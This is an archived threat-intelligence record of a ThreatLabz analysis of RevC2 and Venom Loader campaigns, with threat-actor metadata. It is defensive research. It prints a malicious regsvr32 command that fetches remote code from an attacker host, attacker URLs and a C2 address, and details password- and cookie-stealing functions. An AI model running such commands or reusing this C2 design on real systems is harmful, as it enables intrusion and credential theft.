{
	"id": "d72e230c-5445-4d3a-b581-76540178c7f6",
	"created_at": "2026-04-06T00:06:57.284104Z",
	"updated_at": "2026-04-10T03:36:47.657717Z",
	"deleted_at": null,
	"sha1_hash": "9130f1bf920ec30a0c85bb56633670cc7f90ad58",
	"title": "Unveiling RevC2 and Venom Loader | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 822385,
	"plain_text": "Unveiling RevC2 and Venom Loader | ThreatLabz\r\nBy Muhammed Irfan V A\r\nPublished: 2024-12-02 · Archived: 2026-04-05 16:27:21 UTC\r\nTechnical Analysis\r\nThe following sections are a technical analysis of the campaigns. The URLs and file names used in these\r\ncampaigns vary with each sample. We analyzed a representative sample from each campaign.\r\nCampaign 1: API documentation lure leads to RevC2\r\nThe first campaign, occurring from August to September, uses an API documentation lure to deliver a malicious\r\npayload, RevC2. RevC2 is a backdoor with capabilities to steal sensitive data.\r\nThe figure below illustrates the attack chain that leads to the delivery of RevC2.\r\nFigure 1: Attack chain of the first campaign delivering RevC2 as the payload.\r\nFirst stage: VenomLNK\r\nAlthough the distribution method is currently unknown, the first stage of the attack begins with a VenomLNK file.\r\nThis LNK file contains an obfuscated batch (BAT) script that, when executed, downloads a PNG image\r\nfrom hxxp://gdrive[.]rest:8080/api/API.png. The PNG image is an API documentation lure, as shown in the\r\nfigure below.\r\nhttps://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader\r\nPage 1 of 11\n\nFigure 2: API documentation lure used in the first campaign that leverages RevC2.\r\nThe VenomLNK file executes the following command in the background to register an ActiveX control, triggering\r\nthe execution of RevC2:\r\nwmic process call create \"regsvr32 /s /i \\\\gdrive.rest@8080\\api\\AdvancedWin.ocx\"\r\nSecond stage: RevC2\r\nThe second stage features RevC2, named after the Program Database (PDB) path observed in the binary:\r\nC:\\Users\\PC\\Desktop\\C2New\\Rev\\x64\\Release\\Rev.pdb\r\nUpon execution, RevC2 retrieves the command-line and checks whether the first argument ends with dWin.ocx,\r\nmatching the suffix of the filename. 
RevC2 then retrieves the path of the executable file for the current process and\r\ncompares it to regsvr32.exe. The malicious software only executes if both checks pass, ensuring RevC2 is\r\nlaunched as part of the attack chain and not in analysis environments such as sandboxes.\r\nRevC2 then retrieves the operating system’s local time and creates a log file in the\r\nformat C:\\ProgramData\\boot_%YYYYMMDDTHHMMSS%.log. The log file stores internal messages generated by the\r\nmalware during its execution.\r\nAn example of the log created by RevC2 is shown below:\r\n[2024-11-14 17:21:38.530681]: Multipler : 1\r\n[2024-11-14 17:22:01.546498]: Getting Passwords\r\nRevC2 communication protocol\r\nRevC2 uses WebSockets for C2 communication with the help of a C++ library, websocketpp. The C2 address is\r\nhardcoded in the binary. In the sample we examined, the address was ws://208.85.17[.]52:8082.\r\nAll data exchanged between the victim’s machine and the C2 server are JSON objects.\r\nVictim’s machine to C2 server: This JSON object includes two properties:\r\n1. The output being sent.\r\n2. The command_ID (type) of the output.\r\nThe format of this JSON object is:\r\n{\"%output_name%\": \"%output_value%\",\"type\":\"%command_ID%\"}\r\nC2 server to victim’s machine: This JSON object includes two properties:\r\n1. type: Contains a command_ID that tells the malware what actions to perform.\r\n2. command: Contains the command_parameter related to the action to be performed. In some cases,\r\nthe command property is empty.\r\nThe format of this JSON object is:\r\n{\"type\":\"%command_ID%\",\"command\":\"%command_parameter%\"}\r\nThe command_ID sent by RevC2 to the C2 server is not always the same as the command_ID sent by the C2 server\r\nto RevC2. 
In two cases (when executing shell commands and taking screenshots) the command_ID is different, as\r\nshown in Table 1 and Table 2.\r\nClient registration\r\nThe first data sent to the server is related to registration. The data is a JSON object in the format {\"name\":\r\n\"%computername%\",\"type\":\"0005\"}.\r\nThe figure below shows example network traffic between the victim’s machine and the C2 server.\r\nFigure 3: Example network traffic between a system infected with RevC2 and the C2 server.\r\nCommands supported\r\nRevC2 registers a function handler, which processes the command_ID and command_parameter from the C2\r\nserver and performs the appropriate actions. The command_IDs supported by RevC2 are described in the table\r\nbelow.\r\nAction | command_ID | command_parameter | Description\r\nSteals passwords | 000000 | Empty | Steals passwords from Chromium browsers. RevC2 starts by writing an entry to the log file with the message “Getting Passwords”. Then, RevC2 retrieves saved passwords from Chromium browsers and sends them to the C2 server.\r\nExecutes shell commands | 0001 | %command% | Executes shell commands. The command_parameter contains the command to be executed. A new thread is created to execute the command. The %command% is combined with cmd /c and the resulting command-line is used to create a new process. A pipe is created and the standard output and error of the process are redirected to this pipe. The output is read from the pipe and sent to the C2 server.\r\nTakes screenshots | 0002 | %mutipler% | Takes screenshots of the victim’s system. The command_parameter sent is used as the multiplier. The width and height of the desktop’s screen in pixels are multiplied by this value to configure the resolution of the screenshot. The activity is added to the log file in the format: [%TimeStamp%]:Multipler : %mutipler%. A screenshot of the victim’s desktop is taken, base64-encoded, and sent to the C2 server.\r\nProxies traffic | 0003 | {\"listenerIP\":\"%ip%\",\"listenerPort\":\"%port%\"} | Proxies network data using the SOCKS5 protocol. RevC2 receives the data to proxy from the C2 server in the command_parameter. There are two internal command IDs that RevC2 uses: 0x55 - Connects to a target address and proxies data to the proxy server. 0x70 - Sends data to the connected socket (created by using the command ID 0x55) from the proxy server.\r\nSteals cookies | 0009 | Empty | Steals cookies from Chromium browsers. RevC2 starts by writing an entry to the log file with the message “Getting Cookies”. This ID also logs details related to stealing cookies in the log file. Then, RevC2 retrieves saved cookies from Chromium browsers and sends them to the C2 server.\r\nExecutes a command as a different user | 0012 | {\"username\": \"%username%\",\"password\": \"%password%\",\"command\": \"%commandline%\"} | Executes a command as a different user using the credentials received. The %commandline% can be a file path or a command. RevC2 does not send the command's output to the C2 server.\r\nTable 1: Description of the commands supported by RevC2.\r\nThe data format for each RevC2 command_ID is listed in the table below.\r\nAction | command_ID | Data Format\r\nSteals passwords | 000000 | {\"passwords\":\"Application: %application%\r\nWebsite: %website%\r\nLogin URL: %url%\r\nUser name: %username%\r\nPassword: %password%\r\n\",\"type\":\"000000\"}\r\nExecutes shell commands | 0007 | {\"result\":\"%output_of_command%\",\"type\":\"0007\"}\r\nTakes screenshots | 0006 | {\"image\":\"%base64encoded_image%\",\"type\":\"0006\"}\r\nProxies traffic | 0003 | N/A\r\nSteals cookies | 0009 | {\"cookies\":\"[\r\n{\r\n\"Application\":\"%application%\",\r\n\"domain\": \"%domain%\",\r\n\"expirationDate\": %exp_Date%,\r\n\"httpOnly\": %http_only%,\r\n\"name\": \"%cookie_name%\",\r\n\"path\": \"%path%\",\r\n\"sameSite\": \"%samesite%\",\r\n\"Secure\": %secure%,\r\n\"url\": \"%url%\",\r\n\"value\": \"%cookie_value%\"\r\n}\r\n]\", \"type\": \"0009\"}\r\nExecutes a process as a different user | 0012 | N/A\r\nTable 2: Data format for the command_IDs supported by RevC2.\r\nThreatLabz created a Python script that emulates a RevC2 server. The script is available in our GitHub repository.\r\nThe figure below shows example output of an emulated RevC2 server.\r\nFigure 4: Python script emulating the RevC2 server.\r\nCampaign 2: Crypto transaction lure leads to Venom Loader and Retdoor malware\r\nThe second campaign, occurring from September to October, appears to be using a cryptocurrency transaction lure\r\nto deliver Venom Loader. 
Venom Loader then loads Retdoor, a JavaScript (JS) backdoor providing remote code\r\nexecution (RCE) capabilities to the threat actor.\r\nThe figure below illustrates the attack chain for the second campaign delivering Retdoor.\r\nFigure 5: Attack chain of the second campaign delivering Retdoor as the payload.\r\nFirst stage: VenomLNK\r\nAlthough the method of distribution is currently unknown, the first stage of the attack begins with a VenomLNK\r\nfile. The LNK file contains an obfuscated BAT script which writes a Visual Basic Script (VBS) script\r\n(run_bat.vbs) and a BAT script (bat2.bat) to the Windows temporary directory. VenomLNK first\r\nexecutes run_bat.vbs, which is used to execute bat2.bat. The bat2.bat file downloads an image of a\r\ncryptocurrency transaction as a lure and displays the image to the victim, as shown in the figure below.\r\nFigure 6: Cryptocurrency transaction lure used in the second campaign that leverages Venom Spider tools.\r\nIn the background, the malware downloads base.zip from hxxp://170.75.168[.]151/%computername%/aaa.\r\nThe BAT file then unzips base.zip, which contains ApplicationFrameHost.exe. From here, the BAT file\r\nexecutes ApplicationFrameHost.exe, which sideloads a malicious DLL named dxgi.dll, leading to the\r\nexecution of Venom Loader.\r\nSecond stage: Venom Loader\r\nThe Venom Loader DLL used in this campaign is custom built for each victim and is used to load the next stage.\r\nAs mentioned before, base.zip, which contains Venom Loader, is downloaded\r\nfrom hxxp://170.75.168[.]151/%computername%/aaa.\r\nThe %computername% value is an environment variable which contains the computer name of the system. 
Venom\r\nLoader uses %computername% as the hardcoded XOR key to encode the following stages.\r\nIn this instance, Venom Loader is used to load the Retdoor backdoor. Retdoor’s content is stored as plain text\r\nin Venom Loader. The content is XOR’ed with the %computername% and base64-encoded. The result of this is split\r\ninto three chunks and written to disk with the file names text1, text2, and text3.\r\nAfter this, Venom Loader writes a PowerShell (PS) script to %APPDATA%\\Adobe\\merge.ps1, which is used to\r\ndecode the chunks stored in text1, text2, and text3, and write the result to %LOCALAPPDATA%\\Microsoft\\hello.js.\r\nThen hello.js is executed using cscript.\r\nNext, Venom Loader creates a VBS script named run_all.vbs in the %APPDATA%\\Adobe directory. This script is\r\ndesigned to execute commands passed to it as command-line arguments. Then, run_all.vbs is used to\r\nrun merge.ps1, leading to execution of Retdoor. Finally, Venom Loader establishes persistence for\r\nthe Retdoor backdoor by adding merge.ps1 to the autorun registry\r\nkey HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run under the name GoogleUpdate.\r\nThird stage: Retdoor\r\nRetdoor continuously sends HTTP POST requests in an infinite loop to /api/infos. The POST data is\r\nformatted as name=^%computername%\u0026ret=. The name contains the victim’s computer name and the first request\r\nwill have ret as an empty string. The output of the command to be executed is returned in the next request inside\r\nthe ret parameter. 
The figure below shows the network traffic between a system infected with Retdoor\r\nmalware and the C2 server.\r\nFigure 7: Network traffic between a system infected with Retdoor and the C2 server.\r\nThe response to the request is JSON data in the format {\"command\": %command_encoded%}.\r\nThe command_encoded value is XOR’ed with %computername% and written to the Windows temporary directory as\r\na .cmd file and executed.\r\nSource: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader"
	],
	"report_names": [
		"unveiling-revc2-and-venom-loader"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f2fa9952-301f-4376-ac69-743d6f2bec1e",
			"created_at": "2023-01-06T13:46:39.122721Z",
			"updated_at": "2026-04-10T02:00:03.22231Z",
			"deleted_at": null,
			"main_name": "VENOM SPIDER",
			"aliases": [
				"badbullz",
				"badbullzvenom"
			],
			"source_name": "MISPGALAXY:VENOM SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7a257844-df90-4bd4-b0f1-77d00ff82802",
			"created_at": "2022-10-25T16:07:24.376356Z",
			"updated_at": "2026-04-10T02:00:04.964565Z",
			"deleted_at": null,
			"main_name": "Venom Spider",
			"aliases": [
				"Golden Chickens",
				"TA4557",
				"Venom Spider"
			],
			"source_name": "ETDA:Venom Spider",
			"tools": [
				"More_eggs",
				"PureLocker",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Taurus Loader Reconnaissance Module",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraCrypt",
				"TerraLogger",
				"TerraPreter",
				"TerraRecon",
				"TerraStealer",
				"TerraTV",
				"TerraWiper",
				"ThreatKit",
				"VenomKit",
				"VenomLNK",
				"lite_more_eggs"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434017,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9130f1bf920ec30a0c85bb56633670cc7f90ad58.pdf",
		"text": "https://archive.orkl.eu/9130f1bf920ec30a0c85bb56633670cc7f90ad58.txt",
		"img": "https://archive.orkl.eu/9130f1bf920ec30a0c85bb56633670cc7f90ad58.jpg"
	}
}